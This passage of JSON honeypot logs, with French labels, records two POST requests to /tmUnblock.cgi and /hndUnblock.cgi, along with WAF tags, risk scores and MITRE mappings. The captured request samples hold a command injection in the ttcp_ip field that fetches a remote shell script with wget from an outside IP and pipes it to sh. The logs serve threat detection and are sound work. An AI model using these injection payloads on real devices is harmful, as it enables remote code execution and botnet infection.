\u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":293},{"id":11809655,"ip":"45.153.34.252","ts":"2026-07-14 02:29:20.000000","proto":"tcp","src_port":35844,"dst_port":8081,"service":"http","classification":"http_smuggling_probe","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/hndUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022b49e2ce11732566567c2a35c365676c189916029\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 444, \u0022payload_entropy\u0022: 5.324340749294121, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 80, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022b9aeaac3a723005ca72bac8a661b6a8af9839fb2\u0022, \u0022event_fingerprint\u0022: \u0022dd0f82d801799aa10bcc39ea50a103ff477a827c\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 80}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022fda6a6bde6c51815aa42be1d271960b5\u0022, \u0022path_pattern_hash\u0022: \u00227e7da887259ec686429949e3a182bb9c\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 80}, \u0022payload_preview\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConn\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnection: close\\r\\n\\r\\nttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http\u0022, \u0022payload_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConn\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnection: close\\r\\n\\r\\nttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http\u0022, \u0022payload_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConn\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022937b54698ffc02423194e25f05375fb9e054d941\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConn\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/hndUnblock.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 80\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 80}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 80, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/hndUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConn\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":444},{"id":11809654,"ip":"45.153.34.252","ts":"2026-07-14 02:29:19.000000","proto":"tcp","src_port":35842,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/tmUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00226cff281bfb0055f2e5c6afc1d923500419949544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 438, \u0022payload_entropy\u0022: 5.308016986418687, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00221b72e0cad9dc4a2599a7718a58f3889624ca7773\u0022, \u0022event_fingerprint\u0022: \u002206fbfbf2356862692413fb487e5b816ccb56c176\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002285202c1c22f49925853cdbd7b9e8248c\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConne\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConne\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConne\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022ff8fa4cbbbbb7c72bd6f60f2cf1eceb1c848bee6\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConne\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConne\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 